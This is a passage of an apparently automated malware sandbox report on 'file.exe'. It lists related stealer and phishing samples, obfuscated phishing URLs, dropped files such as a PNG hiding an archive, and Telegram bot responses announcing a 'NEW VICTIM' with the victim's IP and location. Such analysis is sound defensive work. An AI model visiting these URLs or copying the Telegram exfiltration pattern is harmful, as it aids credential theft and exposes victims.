                                                                                                                                                                        Szi2WJUKmv.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        aYxpioi6G3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        api.telegram.orgTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        TELEGRAMRUTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Josho.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.119.80.120
                                                                                                                                                                        http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        k5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        jN6irWtNiG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        yOmgCWM83b.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        copia111224mp.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Agreement for Cooperation.PDF.lnk.download.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Agreement for YouTube cooperation.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                        • 142.250.181.65
                                                                                                                                                                        • 172.217.17.46
                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                        No context
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):156917
                                                                                                                                                                        Entropy (8bit):7.994509354006501
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                        MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                        SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                        SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                        SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):123394
                                                                                                                                                                        Entropy (8bit):7.993523589542907
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
                                                                                                                                                                        MD5:53E54AC43786C11E0DDE9DB8F4EB27AB
                                                                                                                                                                        SHA1:9C5768D5EE037E90DA77F174EF9401970060520E
                                                                                                                                                                        SHA-256:2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
                                                                                                                                                                        SHA-512:CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:PK........DwiY(..wj...........graph.exe..{|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K...*.>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0|_.].e........*==.m.qq....v....g...~o.........~.V?@.s.......z.......#|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.|..x.K.X....U.|..V/,......6...|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.|^............B._C.....-..y;....V.......,|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):251392
                                                                                                                                                                        Entropy (8bit):6.173345887744036
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
                                                                                                                                                                        MD5:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                        SHA1:7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
                                                                                                                                                                        SHA-256:D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
                                                                                                                                                                        SHA-512:C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r*.\sdm_r*.Zs.m_rq.\skm_rq.[sqm_r*.[spm_rq.Zs8m_r*.^shm_ram^r.m_r*.Vs`m_r*.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                        Entropy (8bit):5.107829270071778
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:YKOHdy1JVBa4YGQVPe071kWdPyoZEB65basJENBm9c:YVHdQTBj/Q515PtZp9ujMc
                                                                                                                                                                        MD5:457B89B9CC3C7200335C3C76591DAD10
                                                                                                                                                                        SHA1:A1D8B11A4F7B40D0F8E81D06770024E7927147DB
                                                                                                                                                                        SHA-256:87747CC665FF05F8C8D87CF5CBBDD9A3E68E6D0D23BB2B10E5C96DDF48EF21B7
                                                                                                                                                                        SHA-512:7FF63D92E5203A2C9C74EB2F2AB53E154D07767487CB8CDD0BEA4F74AA624E4D3E57220AC727C6B18B900EE4CC13D9E6F419424F67AF215C7C0760219AD43FF9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:{"ok":true,"result":{"message_id":3314,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018834,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 065367\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                        Entropy (8bit):4.99323851364312
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                        MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                        SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                        SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                        SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):156917
                                                                                                                                                                        Entropy (8bit):7.994509354006501
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                        MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                        SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                        SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                        SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png, Author: ditekSHen
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                        Entropy (8bit):4.99323851364312
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                        MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                        SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                        SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                        SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):156917
                                                                                                                                                                        Entropy (8bit):7.994509354006501
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                        MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                        SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                        SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                        SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                        Entropy (8bit):5.1126764545189305
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:YKOHjy1JVBa4YGQVPe071kW9FPyoZEB65basJENBm9c:YVHjQTBj/Q51xFPtZp9ujMc
                                                                                                                                                                        MD5:5D0C81853F16A49DEE18D5D4AD39F861
                                                                                                                                                                        SHA1:75211BA5600BE63B1CCCDCE137D22540D7A8CCA9
                                                                                                                                                                        SHA-256:C1E0E7B0B1BD748DE0A43813CC79363284F70BEB4B1C9F5DCC1264C6F26987E7
                                                                                                                                                                        SHA-512:D612C48D79ADDA8034869081334296112DA7A1D5B735D970EE5B023B935036356D83F2F6E49015433A973003E347FD500DEABC8031269315B0C459BDCD137457
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"ok":true,"result":{"message_id":3316,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018836,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 065367\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                        Entropy (8bit):6.377818589865092
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:file.exe
                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                        MD5:3567cb15156760b2f111512ffdbc1451
